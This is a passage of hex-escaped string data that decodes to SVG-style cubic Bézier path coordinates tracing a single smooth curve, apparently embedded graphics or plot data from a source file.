\x31\x34\x2e\x35\x36\x35\x36\x38\x35\x39\x39\x32\x38\x20\x30\x2e\
\x39\x33\x31\x39\x38\x39\x36\x32\x33\x31\x37\x39\x20\x31\x34\x2e\
\x35\x39\x32\x39\x35\x39\x30\x39\x34\x35\x20\x43\x20\x30\x2e\x39\
\x33\x38\x32\x33\x30\x36\x39\x32\x30\x31\x35\x20\x31\x34\x2e\x36\
\x32\x30\x32\x33\x32\x31\x39\x36\x32\x20\x30\x2e\x39\x34\x34\x34\
\x37\x31\x37\x36\x30\x38\x35\x31\x20\x31\x34\x2e\x36\x34\x36\x38\
\x37\x34\x31\x36\x34\x33\x20\x30\x2e\x39\x35\x30\x37\x31\x32\x38\
\x32\x39\x36\x38\x37\x20\x31\x34\x2e\x36\x37\x32\x38\x36\x38\x32\
\x34\x34\x39\x20\x43\x20\x30\x2e\x39\x35\x36\x39\x35\x33\x38\x39\
\x38\x35\x32\x33\x20\x31\x34\x2e\x36\x39\x38\x38\x36\x32\x33\x32\
\x35\x35\x20\x30\x2e\x39\x36\x33\x31\x39\x34\x39\x36\x37\x33\x35\
\x39\x20\x31\x34\x2e\x37\x32\x34\x32\x30\x34\x36\x31\x39\x33\x20\
\x30\x2e\x39\x36\x39\x34\x33\x36\x30\x33\x36\x31\x39\x35\x20\x31\
\x34\x2e\x37\x34\x38\x38\x37\x39\x34\x39\x37\x34\x20\x43\x20\x30\
\x2e\x39\x37\x35\x36\x37\x37\x31\x30\x35\x30\x33\x31\x20\x31\x34\
\x2e\x37\x37\x33\x35\x35\x34\x33\x37\x35\x35\x20\x30\x2e\x39\x38\
\x31\x39\x31\x38\x31\x37\x33\x38\x36\x37\x20\x31\x34\x2e\x37\x39\
\x37\x35\x35\x37\x38\x32\x31\x32\x20\x30\x2e\x39\x38\x38\x31\x35\
\x39\x32\x34\x32\x37\x30\x33\x20\x31\x34\x2e\x38\x32\x30\x38\x37\
\x35\x33\x35\x34\x37\x20\x43\x20\x30\x2e\x39\x39\x34\x34\x30\x30\
\x33\x31\x31\x35\x34\x20\x31\x34\x2e\x38\x34\x34\x31\x39\x32\x38\
\x38\x38\x32\x20\x31\x2e\x30\x30\x30\x36\x34\x31\x33\x38\x30\x33\
\x38\x20\x31\x34\x2e\x38\x36\x36\x38\x32\x30\x33\x38\x31\x36\x20\
\x31\x2e\x30\x30\x36\x38\x38\x32\x34\x34\x39\x32\x31\x20\x31\x34\
\x2e\x38\x38\x38\x37\x34\x34\x35\x32\x36\x34\x20\x43\x20\x31\x2e\
\x30\x31\x33\x31\x32\x33\x35\x31\x38\x30\x35\x20\x31\x34\x2e\x39\
\x31\x30\x36\x36\x38\x36\x37\x31\x33\x20\x31\x2e\x30\x31\x39\x33\
\x36\x34\x35\x38\x36\x38\x38\x20\x31\x34\x2e\x39\x33\x31\x38\x38\
\x35\x32\x33\x35\x20\x31\x2e\x30\x32\x35\x36\x30\x35\x36\x35\x35\
\x37\x32\x20\x31\x34\x2e\x39\x35\x32\x33\x38\x32\x31\x30\x31\x31\
\x20\x43\x20\x31\x2e\x30\x33\x31\x38\x34\x36\x37\x32\x34\x35\x36\
\x20\x31\x34\x2e\x39\x37\x32\x38\x37\x38\x39\x36\x37\x33\x20\x31\
\x2e\x30\x33\x38\x30\x38\x37\x37\x39\x33\x33\x39\x20\x31\x34\x2e\
\x39\x39\x32\x36\x35\x31\x38\x30\x35\x20\x31\x2e\x30\x34\x34\x33\
\x32\x38\x38\x36\x32\x32\x33\x20\x31\x35\x2e\x30\x31\x31\x36\x38\
\x39\x37\x30\x38\x36\x20\x43\x20\x31\x2e\x30\x35\x30\x35\x36\x39\
\x39\x33\x31\x30\x36\x20\x31\x35\x2e\x30\x33\x30\x37\x32\x37\x36\
\x31\x32\x32\x20\x31\x2e\x30\x35\x36\x38\x31\x30\x39\x39\x39\x39\
\x20\x31\x35\x2e\x30\x34\x39\x30\x32\x36\x31\x35\x39\x31\x20\x31\
\x2e\x30\x36\x33\x30\x35\x32\x30\x36\x38\x37\x34\x20\x31\x35\x2e\
\x30\x36\x36\x35\x37\x35\x36\x37\x31\x36\x20\x43\x20\x31\x2e\x30\
\x36\x39\x32\x39\x33\x31\x33\x37\x35\x37\x20\x31\x35\x2e\x30\x38\
\x34\x31\x32\x35\x31\x38\x34\x31\x20\x31\x2e\x30\x37\x35\x35\x33\
\x34\x32\x30\x36\x34\x31\x20\x31\x35\x2e\x31\x30\x30\x39\x32\x31\
\x31\x35\x34\x37\x20\x31\x2e\x30\x38\x31\x37\x37\x35\x32\x37\x35\
\x32\x34\x20\x31\x35\x2e\x31\x31\x36\x39\x35\x35\x31\x34\x38\x32\
\x20\x43\x20\x31\x2e\x30\x38\x38\x30\x31\x36\x33\x34\x34\x30\x38\
\x20\x31\x35\x2e\x31\x33\x32\x39\x38\x39\x31\x34\x31\x37\x20\x31\
\x2e\x30\x39\x34\x32\x35\x37\x34\x31\x32\x39\x32\x20\x31\x35\x2e\
\x31\x34\x38\x32\x35\x36\x35\x37\x32\x39\x20\x31\x2e\x31\x30\x30\
\x34\x39\x38\x34\x38\x31\x37\x35\x20\x31\x35\x2e\x31\x36\x32\x37\
\x35\x30\x32\x36\x32\x33\x20\x43\x20\x31\x2e\x31\x30\x36\x37\x33\
\x39\x35\x35\x30\x35\x39\x20\x31\x35\x2e\x31\x37\x37\x32\x34\x33\
\x39\x35\x31\x36\x20\x31\x2e\x31\x31\x32\x39\x38\x30\x36\x31\x39\
\x34\x32\x20\x31\x35\x2e\x31\x39\x30\x39\x35\x39\x32\x34\x33\x33\
\x20\x31\x2e\x31\x31\x39\x32\x32\x31\x36\x38\x38\x32\x36\x20\x31\
\x35\x2e\x32\x30\x33\x38\x39\x30\x32\x32\x34\x32\x20\x43\x20\x31\
\x2e\x31\x32\x35\x34\x36\x32\x37\x35\x37\x31\x20\x31\x35\x2e\x32\
\x31\x36\x38\x32\x31\x32\x30\x35\x32\x20\x31\x2e\x31\x33\x31\x37\
\x30\x33\x38\x32\x35\x39\x33\x20\x31\x35\x2e\x32\x32\x38\x39\x36\
\x33\x31\x35\x36\x33\x20\x31\x2e\x31\x33\x37\x39\x34\x34\x38\x39\
\x34\x37\x37\x20\x31\x35\x2e\x32\x34\x30\x33\x31\x31\x34\x34\x30\
\x34\x20\x43\x20\x31\x2e\x31\x34\x34\x31\x38\x35\x39\x36\x33\x36\
\x20\x31\x35\x2e\x32\x35\x31\x36\x35\x39\x37\x32\x34\x34\x20\x31\
\x2e\x31\x35\x30\x34\x32\x37\x30\x33\x32\x34\x34\x20\x31\x35\x2e\
\x32\x36\x32\x32\x30\x39\x35\x36\x36\x31\x20\x31\x2e\x31\x35\x36\
\x36\x36\x38\x31\x30\x31\x32\x38\x20\x31\x35\x2e\x32\x37\x31\x39\
\x35\x37\x36\x31\x31\x32\x20\x43\x20\x31\x2e\x31\x36\x32\x39\x30\
\x39\x31\x37\x30\x31\x31\x20\x31\x35\x2e\x32\x38\x31\x37\x30\x35\
\x36\x35\x36\x33\x20\x31\x2e\x31\x36\x39\x31\x35\x30\x32\x33\x38\
\x39\x35\x20\x31\x35\x2e\x32\x39\x30\x36\x34\x37\x30\x38\x30\x37\
\x20\x31\x2e\x31\x37\x35\x33\x39\x31\x33\x30\x37\x37\x38\x20\x31\
\x35\x2e\x32\x39\x38\x37\x37\x39\x38\x31\x38\x34\x20\x43\x20\x31\
\x2e\x31\x38\x31\x36\x33\x32\x33\x37\x36\x36\x32\x20\x31\x35\x2e\
\x33\x30\x36\x39\x31\x32\x35\x35\x36\x31\x20\x31\x2e\x31\x38\x37\
\x38\x37\x33\x34\x34\x35\x34\x36\x20\x31\x35\x2e\x33\x31\x34\x32\
\x33\x31\x37\x34\x31\x37\x20\x31\x2e\x31\x39\x34\x31\x31\x34\x35\
\x31\x34\x32\x39\x20\x31\x35\x2e\x33\x32\x30\x37\x33\x36\x36\x30\
\x30\x35\x20\x43\x20\x31\x2e\x32\x30\x30\x33\x35\x35\x35\x38\x33\
\x31\x33\x20\x31\x35\x2e\x33\x32\x37\x32\x34\x31\x34\x35\x39\x34\
\x20\x31\x2e\x32\x30\x36\x35\x39\x36\x36\x35\x31\x39\x37\x20\x31\
\x35\x2e\x33\x33\x32\x39\x32\x37\x30\x39\x32\x32\x20\x31\x2e\x32\
\x31\x32\x38\x33\x37\x37\x32\x30\x38\x20\x31\x35\x2e\x33\x33\x37\
\x37\x39\x34\x30\x31\x37\x20\x43\x20\x31\x2e\x32\x31\x39\x30\x37\
\x38\x37\x38\x39\x36\x34\x20\x31\x35\x2e\x33\x34\x32\x36\x36\x30\
\x39\x34\x31\x38\x20\x31\x2e\x32\x32\x35\x33\x31\x39\x38\x35\x38\
\x34\x37\x20\x31\x35\x2e\x33\x34\x36\x37\x30\x34\x32\x33\x33\x31\
\x20\x31\x2e\x32\x33\x31\x35\x36\x30\x39\x32\x37\x33\x31\x20\x31\
\x35\x2e\x33\x34\x39\x39\x32\x35\x37\x30\x30\x36\x20\x43\x20\x31\
\x2e\x32\x33\x37\x38\x30\x31\x39\x39\x36\x31\x35\x20\x31\x35\x2e\
\x33\x35\x33\x31\x34\x37\x31\x36\x38\x31\x20\x31\x2e\x32\x34\x34\
\x30\x34\x33\x30\x36\x34\x39\x38\x20\x31\x35\x2e\x33\x35\x35\x35\
\x34\x31\x38\x36\x37\x38\x20\x31\x2e\x32\x35\x30\x32\x38\x34\x31\
\x33\x33\x38\x32\x20\x31\x35\x2e\x33\x35\x37\x31\x31\x32\x38\x39\
\x38\x34\x20\x43\x20\x31\x2e\x32\x35\x36\x35\x32\x35\x32\x30\x32\
\x36\x35\x20\x31\x35\x2e\x33\x35\x38\x36\x38\x33\x39\x32\x38\x39\
\x20\x31\x2e\x32\x36\x32\x37\x36\x36\x32\x37\x31\x34\x39\x20\x31\
\x35\x2e\x33\x35\x39\x34\x32\x36\x33\x33\x35\x33\x20\x31\x2e\x32\
\x36\x39\x30\x30\x37\x33\x34\x30\x33\x33\x20\x31\x35\x2e\x33\x35\
\x39\x33\x34\x34\x35\x30\x30\x34\x20\x43\x20\x31\x2e\x32\x37\x35\
\x32\x34\x38\x34\x30\x39\x31\x36\x20\x31\x35\x2e\x33\x35\x39\x32\
\x36\x32\x36\x36\x35\x35\x20\x31\x2e\x32\x38\x31\x34\x38\x39\x34\
\x37\x38\x20\x31\x35\x2e\x33\x35\x38\x33\x35\x31\x36\x33\x30\x39\
\x20\x31\x2e\x32\x38\x37\x37\x33\x30\x35\x34\x36\x38\x33\x20\x31\
\x35\x2e\x33\x35\x36\x36\x31\x37\x30\x35\x37\x31\x20\x43\x20\x31\
\x2e\x32\x39\x33\x39\x37\x31\x36\x31\x35\x36\x37\x20\x31\x35\x2e\
\x33\x35\x34\x38\x38\x32\x34\x38\x33\x32\x20\x31\x2e\x33\x30\x30\
\x32\x31\x32\x36\x38\x34\x35\x31\x20\x31\x35\x2e\x33\x35\x32\x33\
\x31\x39\x34\x31\x36\x20\x31\x2e\x33\x30\x36\x34\x35\x33\x37\x35\
\x33\x33\x34\x20\x31\x35\x2e\x33\x34\x38\x39\x33\x34\x37\x38\x34\
\x35\x20\x43\x20\x31\x2e\x33\x31\x32\x36\x39\x34\x38\x32\x32\x31\
\x38\x20\x31\x35\x2e\x33\x34\x35\x35\x35\x30\x31\x35\x33\x20\x31\
\x2e\x33\x31\x38\x39\x33\x35\x38\x39\x31\x30\x31\x20\x31\x35\x2e\
\x33\x34\x31\x33\x33\x39\x30\x31\x35\x31\x20\x31\x2e\x33\x32\x35\
\x31\x37\x36\x39\x35\x39\x38\x35\x20\x31\x35\x2e\x33\x33\x36\x33\
\x30\x39\x35\x35\x37\x38\x20\x43\x20\x31\x2e\x33\x33\x31\x34\x31\
\x38\x30\x32\x38\x36\x39\x20\x31\x35\x2e\x33\x33\x31\x32\x38\x30\
\x31\x30\x30\x35\x20\x31\x2e\x33\x33\x37\x36\x35\x39\x30\x39\x37\
\x35\x32\x20\x31\x35\x2e\x33\x32\x35\x34\x32\x37\x34\x30\x31\x35\
\x20\x31\x2e\x33\x34\x33\x39\x30\x30\x31\x36\x36\x33\x36\x20\x31\
\x35\x2e\x33\x31\x38\x37\x36\x30\x38\x39\x33\x20\x43\x20\x31\x2e\
\x33\x35\x30\x31\x34\x31\x32\x33\x35\x31\x39\x20\x31\x35\x2e\x33\
\x31\x32\x30\x39\x34\x33\x38\x34\x34\x20\x31\x2e\x33\x35\x36\x33\
\x38\x32\x33\x30\x34\x30\x33\x20\x31\x35\x2e\x33\x30\x34\x36\x30\
\x39\x31\x37\x31\x33\x20\x31\x2e\x33\x36\x32\x36\x32\x33\x33\x37\
\x32\x38\x37\x20\x31\x35\x2e\x32\x39\x36\x33\x31\x35\x39\x31\x36\
\x35\x20\x43\x20\x31\x2e\x33\x36\x38\x38\x36\x34\x34\x34\x31\x37\
\x20\x31\x35\x2e\x32\x38\x38\x30\x32\x32\x36\x36\x31\x37\x20\x31\
\x2e\x33\x37\x35\x31\x30\x35\x35\x31\x30\x35\x34\x20\x31\x35\x2e\
\x32\x37\x38\x39\x31\x36\x35\x30\x35\x20\x31\x2e\x33\x38\x31\x33\
\x34\x36\x35\x37\x39\x33\x37\x20\x31\x35\x2e\x32\x36\x39\x30\x30\
\x39\x33\x32\x33\x36\x20\x43\x20\x31\x2e\x33\x38\x37\x35\x38\x37\
\x36\x34\x38\x32\x31\x20\x31\x35\x2e\x32\x35\x39\x31\x30\x32\x31\
\x34\x32\x32\x20\x31\x2e\x33\x39\x33\x38\x32\x38\x37\x31\x37\x30\
\x35\x20\x31\x35\x2e\x32\x34\x38\x33\x38\x39\x31\x31\x38\x31\x20\
\x31\x2e\x34\x30\x30\x30\x36\x39\x37\x38\x35\x38\x38\x20\x31\x35\
\x2e\x32\x33\x36\x38\x38\x33\x33\x32\x34\x35\x20\x43\x20\x31\x2e\
\x34\x30\x36\x33\x31\x30\x38\x35\x34\x37\x32\x20\x31\x35\x2e\x32\
\x32\x35\x33\x37\x37\x35\x33\x30\x38\x20\x31\x2e\x34\x31\x32\x35\
\x35\x31\x39\x32\x33\x35\x35\x20\x31\x35\x2e\x32\x31\x33\x30\x37\
\x34\x31\x39\x39\x35\x20\x31\x2e\x34\x31\x38\x37\x39\x32\x39\x39\
\x32\x33\x39\x20\x31\x35\x2e\x31\x39\x39\x39\x38\x37\x35\x37\x39\
\x32\x20\x43\x20\x31\x2e\x34\x32\x35\x30\x33\x34\x30\x36\x31\x32\
\x33\x20\x31\x35\x2e\x31\x38\x36\x39\x30\x30\x39\x35\x38\x39\x20\
\x31\x2e\x34\x33\x31\x32\x37\x35\x31\x33\x30\x30\x36\x20\x31\x35\
\x2e\x31\x37\x33\x30\x32\x36\x33\x33\x38\x36\x20\x31\x2e\x34\x33\
\x37\x35\x31\x36\x31\x39\x38\x39\x20\x31\x35\x2e\x31\x35\x38\x33\
\x37\x39\x31\x32\x30\x37\x20\x43\x20\x31\x2e\x34\x34\x33\x37\x35\
\x37\x32\x36\x37\x37\x33\x20\x31\x35\x2e\x31\x34\x33\x37\x33\x31\
\x39\x30\x32\x39\x20\x31\x2e\x34\x34\x39\x39\x39\x38\x33\x33\x36\
\x35\x37\x20\x31\x35\x2e\x31\x32\x38\x33\x30\x37\x34\x34\x30\x39\
\x20\x31\x2e\x34\x35\x36\x32\x33\x39\x34\x30\x35\x34\x31\x20\x31\
\x35\x2e\x31\x31\x32\x31\x32\x32\x32\x36\x37\x31\x20\x43\x20\x31\
\x2e\x34\x36\x32\x34\x38\x30\x34\x37\x34\x32\x34\x20\x31\x35\x2e\
\x30\x39\x35\x39\x33\x37\x30\x39\x33\x32\x20\x31\x2e\x34\x36\x38\
\x37\x32\x31\x35\x34\x33\x30\x38\x20\x31\x35\x2e\x30\x37\x38\x39\
\x38\x36\x36\x33\x32\x35\x20\x31\x2e\x34\x37\x34\x39\x36\x32\x36\
\x31\x31\x39\x31\x20\x31\x35\x2e\x30\x36\x31\x32\x38\x38\x35\x32\
\x31\x35\x20\x43\x20\x31\x2e\x34\x38\x31\x32\x30\x33\x36\x38\x30\
\x37\x35\x20\x31\x35\x2e\x30\x34\x33\x35\x39\x30\x34\x31\x30\x35\
\x20\x31\x2e\x34\x38\x37\x34\x34\x34\x37\x34\x39\x35\x39\x20\x31\
\x35\x2e\x30\x32\x35\x31\x34\x30\x31\x35\x32\x39\x20\x31\x2e\x34\
\x39\x33\x36\x38\x35\x38\x31\x38\x34\x32\x20\x31\x35\x2e\x30\x30\
\x35\x39\x35\x36\x34\x36\x32\x33\x20\x43\x20\x31\x2e\x34\x39\x39\
\x39\x32\x36\x38\x38\x37\x32\x36\x20\x31\x34\x2e\x39\x38\x36\x37\
\x37\x32\x37\x37\x31\x36\x20\x31\x2e\x35\x30\x36\x31\x36\x37\x39\
\x35\x36\x31\x20\x31\x34\x2e\x39\x36\x36\x38\x35\x31\x32\x33\x37\
\x33\x20\x31\x2e\x35\x31\x32\x34\x30\x39\x30\x32\x34\x39\x33\x20\
\x31\x34\x2e\x39\x34\x36\x32\x31\x31\x36\x32\x31\x31\x20\x43\x20\
\x31\x2e\x35\x31\x38\x36\x35\x30\x30\x39\x33\x37\x37\x20\x31\x34\
\x2e\x39\x32\x35\x35\x37\x32\x30\x30\x34\x38\x20\x31\x2e\x35\x32\
\x34\x38\x39\x31\x31\x36\x32\x36\x20\x31\x34\x2e\x39\x30\x34\x32\
\x30\x39\x39\x38\x38\x33\x20\x31\x2e\x35\x33\x31\x31\x33\x32\x32\
\x33\x31\x34\x34\x20\x31\x34\x2e\x38\x38\x32\x31\x34\x36\x33\x35\
\x30\x39\x20\x43\x20\x31\x2e\x35\x33\x37\x33\x37\x33\x33\x30\x30\
\x32\x38\x20\x31\x34\x2e\x38\x36\x30\x30\x38\x32\x37\x31\x33\x34\
\x20\x31\x2e\x35\x34\x33\x36\x31\x34\x33\x36\x39\x31\x31\x20\x31\
\x34\x2e\x38\x33\x37\x33\x31\x33\x32\x33\x35\x39\x20\x31\x2e\x35\
\x34\x39\x38\x35\x35\x34\x33\x37\x39\x35\x20\x31\x34\x2e\x38\x31\
\x33\x38\x35\x39\x36\x38\x33\x20\x43\x20\x31\x2e\x35\x35\x36\x30\
\x39\x36\x35\x30\x36\x37\x38\x20\x31\x34\x2e\x37\x39\x30\x34\x30\
\x36\x31\x33\x30\x31\x20\x31\x2e\x35\x36\x32\x33\x33\x37\x35\x37\
\x35\x36\x32\x20\x31\x34\x2e\x37\x36\x36\x32\x36\x34\x33\x38\x38\
\x34\x20\x31\x2e\x35\x36\x38\x35\x37\x38\x36\x34\x34\x34\x36\x20\
\x31\x34\x2e\x37\x34\x31\x34\x35\x37\x31\x37\x34\x33\x20\x43\x20\
\x31\x2e\x35\x37\x34\x38\x31\x39\x37\x31\x33\x32\x39\x20\x31\x34\
\x2e\x37\x31\x36\x36\x34\x39\x39\x36\x30\x32\x20\x31\x2e\x35\x38\
\x31\x30\x36\x30\x37\x38\x32\x31\x33\x20\x31\x34\x2e\x36\x39\x31\
\x31\x37\x33\x32\x37\x32\x33\x20\x31\x2e\x35\x38\x37\x33\x30\x31\
\x38\x35\x30\x39\x36\x20\x31\x34\x2e\x36\x36\x35\x30\x35\x30\x37\
\x34\x33\x37\x20\x43\x20\x31\x2e\x35\x39\x33\x35\x34\x32\x39\x31\
\x39\x38\x20\x31\x34\x2e\x36\x33\x38\x39\x32\x38\x32\x31\x35\x32\
\x20\x31\x2e\x35\x39\x39\x37\x38\x33\x39\x38\x38\x36\x34\x20\x31\
\x34\x2e\x36\x31\x32\x31\x35\x35\x39\x36\x32\x37\x20\x31\x2e\x36\
\x30\x36\x30\x32\x35\x30\x35\x37\x34\x37\x20\x31\x34\x2e\x35\x38\
\x34\x37\x35\x38\x34\x39\x39\x35\x20\x43\x20\x31\x2e\x36\x31\x32\
\x32\x36\x36\x31\x32\x36\x33\x31\x20\x31\x34\x2e\x35\x35\x37\x33\
\x36\x31\x30\x33\x36\x34\x20\x31\x2e\x36\x31\x38\x35\x30\x37\x31\
\x39\x35\x31\x34\x20\x31\x34\x2e\x35\x32\x39\x33\x33\x34\x36\x30\
\x33\x36\x20\x31\x2e\x36\x32\x34\x37\x34\x38\x32\x36\x33\x39\x38\
\x20\x31\x34\x2e\x35\x30\x30\x37\x30\x34\x35\x35\x36\x36\x20\x43\
\x20\x31\x2e\x36\x33\x30\x39\x38\x39\x33\x33\x32\x38\x32\x20\x31\
\x34\x2e\x34\x37\x32\x30\x37\x34\x35\x30\x39\x36\x20\x31\x2e\x36\
\x33\x37\x32\x33\x30\x34\x30\x31\x36\x35\x20\x31\x34\x2e\x34\x34\
\x32\x38\x33\x37\x32\x31\x39\x34\x20\x31\x2e\x36\x34\x33\x34\x37\
\x31\x34\x37\x30\x34\x39\x20\x31\x34\x2e\x34\x31\x33\x30\x31\x38\
\x38\x34\x34\x36\x20\x43\x20\x31\x2e\x36\x34\x39\x37\x31\x32\x35\
\x33\x39\x33\x32\x20\x31\x34\x2e\x33\x38\x33\x32\x30\x30\x34\x36\
\x39\x38\x20\x31\x2e\x36\x35\x35\x39\x35\x33\x36\x30\x38\x31\x36\
\x20\x31\x34\x2e\x33\x35\x32\x37\x39\x37\x35\x31\x36\x39\x20\x31\
\x2e\x36\x36\x32\x31\x39\x34\x36\x37\x37\x20\x31\x34\x2e\x33\x32\
\x31\x38\x33\x36\x39\x30\x37\x31\x20\x43\x20\x31\x2e\x36\x36\x38\
\x34\x33\x35\x37\x34\x35\x38\x33\x20\x31\x34\x2e\x32\x39\x30\x38\
\x37\x36\x32\x39\x37\x34\x20\x31\x2e\x36\x37\x34\x36\x37\x36\x38\
\x31\x34\x36\x37\x20\x31\x34\x2e\x32\x35\x39\x33\x35\x34\x36\x37\
\x38\x33\x20\x31\x2e\x36\x38\x30\x39\x31\x37\x38\x38\x33\x35\x20\
\x31\x34\x2e\x32\x32\x37\x32\x39\x39\x36\x39\x32\x32\x20\x43\x20\
\x31\x2e\x36\x38\x37\x31\x35\x38\x39\x35\x32\x33\x34\x20\x31\x34\
\x2e\x31\x39\x35\x32\x34\x34\x37\x30\x36\x31\x20\x31\x2e\x36\x39\
\x33\x34\x30\x30\x30\x32\x31\x31\x38\x20\x31\x34\x2e\x31\x36\x32\
\x36\x35\x33\x31\x34\x36\x37\x20\x31\x2e\x36\x39\x39\x36\x34\x31\
\x30\x39\x30\x30\x31\x20\x31\x34\x2e\x31\x32\x39\x35\x35\x33\x33\
\x33\x34\x35\x20\x43\x20\x31\x2e\x37\x30\x35\x38\x38\x32\x31\x35\
\x38\x38\x35\x20\x31\x34\x2e\x30\x39\x36\x34\x35\x33\x35\x32\x32\
\x33\x20\x31\x2e\x37\x31\x32\x31\x32\x33\x32\x32\x37\x36\x38\x20\
\x31\x34\x2e\x30\x36\x32\x38\x34\x32\x34\x30\x32\x32\x20\x31\x2e\
\x37\x31\x38\x33\x36\x34\x32\x39\x36\x35\x32\x20\x31\x34\x2e\x30\
\x32\x38\x37\x34\x38\x39\x32\x39\x32\x20\x43\x20\x31\x2e\x37\x32\
\x34\x36\x30\x35\x33\x36\x35\x33\x36\x20\x31\x33\x2e\x39\x39\x34\
\x36\x35\x35\x34\x35\x36\x32\x20\x31\x2e\x37\x33\x30\x38\x34\x36\
\x34\x33\x34\x31\x39\x20\x31\x33\x2e\x39\x36\x30\x30\x37\x36\x37\
\x33\x31\x31\x20\x31\x2e\x37\x33\x37\x30\x38\x37\x35\x30\x33\x30\
\x33\x20\x31\x33\x2e\x39\x32\x35\x30\x34\x32\x32\x39\x38\x37\x20\
\x43\x20\x31\x2e\x37\x34\x33\x33\x32\x38\x35\x37\x31\x38\x36\x20\
\x31\x33\x2e\x38\x39\x30\x30\x30\x37\x38\x36\x36\x32\x20\x31\x2e\
\x37\x34\x39\x35\x36\x39\x36\x34\x30\x37\x20\x31\x33\x2e\x38\x35\
\x34\x35\x31\x34\x39\x38\x37\x36\x20\x31\x2e\x37\x35\x35\x38\x31\
\x30\x37\x30\x39\x35\x34\x20\x31\x33\x2e\x38\x31\x38\x35\x39\x33\
\x37\x35\x31\x35\x20\x43\x20\x31\x2e\x37\x36\x32\x30\x35\x31\x37\
\x37\x38\x33\x37\x20\x31\x33\x2e\x37\x38\x32\x36\x37\x32\x35\x31\
\x35\x35\x20\x31\x2e\x37\x36\x38\x32\x39\x32\x38\x34\x37\x32\x31\
\x20\x31\x33\x2e\x37\x34\x36\x33\x32\x30\x33\x34\x37\x37\x20\x31\
\x2e\x37\x37\x34\x35\x33\x33\x39\x31\x36\x30\x35\x20\x31\x33\x2e\
\x37\x30\x39\x35\x36\x37\x38\x33\x34\x37\x20\x43\x20\x31\x2e\x37\
\x38\x30\x37\x37\x34\x39\x38\x34\x38\x38\x20\x31\x33\x2e\x36\x37\
\x32\x38\x31\x35\x33\x32\x31\x37\x20\x31\x2e\x37\x38\x37\x30\x31\
\x36\x30\x35\x33\x37\x32\x20\x31\x33\x2e\x36\x33\x35\x36\x36\x30\
\x30\x35\x37\x37\x20\x31\x2e\x37\x39\x33\x32\x35\x37\x31\x32\x32\
\x35\x35\x20\x31\x33\x2e\x35\x39\x38\x31\x33\x33\x30\x37\x39\x33\
\x20\x43\x20\x31\x2e\x37\x39\x39\x34\x39\x38\x31\x39\x31\x33\x39\
\x20\x31\x33\x2e\x35\x36\x30\x36\x30\x36\x31\x30\x31\x20\x31\x2e\
\x38\x30\x35\x37\x33\x39\x32\x36\x30\x32\x33\x20\x31\x33\x2e\x35\
\x32\x32\x37\x30\x35\x31\x37\x34\x39\x20\x31\x2e\x38\x31\x31\x39\
\x38\x30\x33\x32\x39\x30\x36\x20\x31\x33\x2e\x34\x38\x34\x34\x36\
\x31\x37\x34\x20\x43\x20\x31\x2e\x38\x31\x38\x32\x32\x31\x33\x39\
\x37\x39\x20\x31\x33\x2e\x34\x34\x36\x32\x31\x38\x33\x30\x35\x31\
\x20\x31\x2e\x38\x32\x34\x34\x36\x32\x34\x36\x36\x37\x33\x20\x31\
\x33\x2e\x34\x30\x37\x36\x33\x30\x33\x30\x33\x38\x20\x31\x2e\x38\
\x33\x30\x37\x30\x33\x35\x33\x35\x35\x37\x20\x31\x33\x2e\x33\x36\
\x38\x37\x32\x39\x35\x32\x38\x36\x20\x43\x20\x31\x2e\x38\x33\x36\
\x39\x34\x34\x36\x30\x34\x34\x31\x20\x31\x33\x2e\x33\x32\x39\x38\
\x32\x38\x37\x35\x33\x35\x20\x31\x2e\x38\x34\x33\x31\x38\x35\x36\
\x37\x33\x32\x34\x20\x31\x33\x2e\x32\x39\x30\x36\x31\x33\x33\x32\
\x35\x38\x20\x31\x2e\x38\x34\x39\x34\x32\x36\x37\x34\x32\x30\x38\
\x20\x31\x33\x2e\x32\x35\x31\x31\x31\x35\x33\x34\x32\x38\x20\x43\
\x20\x31\x2e\x38\x35\x35\x36\x36\x37\x38\x31\x30\x39\x31\x20\x31\
\x33\x2e\x32\x31\x31\x36\x31\x37\x33\x35\x39\x38\x20\x31\x2e\x38\
\x36\x31\x39\x30\x38\x38\x37\x39\x37\x35\x20\x31\x33\x2e\x31\x37\
\x31\x38\x33\x35\x31\x32\x34\x36\x20\x31\x2e\x38\x36\x38\x31\x34\
\x39\x39\x34\x38\x35\x39\x20\x31\x33\x2e\x31\x33\x31\x38\x30\x30\
\x39\x38\x39\x33\x20\x43\x20\x31\x2e\x38\x37\x34\x33\x39\x31\x30\
\x31\x37\x34\x32\x20\x31\x33\x2e\x30\x39\x31\x37\x36\x36\x38\x35\
\x33\x39\x20\x31\x2e\x38\x38\x30\x36\x33\x32\x30\x38\x36\x32\x36\
\x20\x31\x33\x2e\x30\x35\x31\x34\x37\x39\x33\x30\x36\x31\x20\x31\
\x2e\x38\x38\x36\x38\x37\x33\x31\x35\x35\x30\x39\x20\x31\x33\x2e\
\x30\x31\x30\x39\x37\x30\x39\x30\x32\x38\x20\x43\x20\x31\x2e\x38\
\x39\x33\x31\x31\x34\x32\x32\x33\x39\x33\x20\x31\x32\x2e\x39\x37\
\x30\x34\x36\x32\x34\x39\x39\x35\x20\x31\x2e\x38\x39\x39\x33\x35\
\x35\x32\x39\x32\x37\x37\x20\x31\x32\x2e\x39\x32\x39\x37\x33\x31\
\x39\x31\x35\x32\x20\x31\x2e\x39\x30\x35\x35\x39\x36\x33\x36\x31\
\x36\x20\x31\x32\x2e\x38\x38\x38\x38\x31\x31\x38\x36\x31\x33\x20\
\x43\x20\x31\x2e\x39\x31\x31\x38\x33\x37\x34\x33\x30\x34\x34\x20\
\x31\x32\x2e\x38\x34\x37\x38\x39\x31\x38\x30\x37\x35\x20\x31\x2e\
\x39\x31\x38\x30\x37\x38\x34\x39\x39\x32\x37\x20\x31\x32\x2e\x38\
\x30\x36\x37\x38\x31\x31\x34\x37\x35\x20\x31\x2e\x39\x32\x34\x33\
\x31\x39\x35\x36\x38\x31\x31\x20\x31\x32\x2e\x37\x36\x35\x35\x31\
\x32\x36\x39\x36\x39\x20\x43\x20\x31\x2e\x39\x33\x30\x35\x36\x30\
\x36\x33\x36\x39\x35\x20\x31\x32\x2e\x37\x32\x34\x32\x34\x34\x32\
\x34\x36\x33\x20\x31\x2e\x39\x33\x36\x38\x30\x31\x37\x30\x35\x37\
\x38\x20\x31\x32\x2e\x36\x38\x32\x38\x31\x37\x30\x35\x39\x20\x31\
\x2e\x39\x34\x33\x30\x34\x32\x37\x37\x34\x36\x32\x20\x31\x32\x2e\
\x36\x34\x31\x32\x36\x34\x30\x30\x34\x20\x43\x20\x31\x2e\x39\x34\
\x39\x32\x38\x33\x38\x34\x33\x34\x35\x20\x31\x32\x2e\x35\x39\x39\
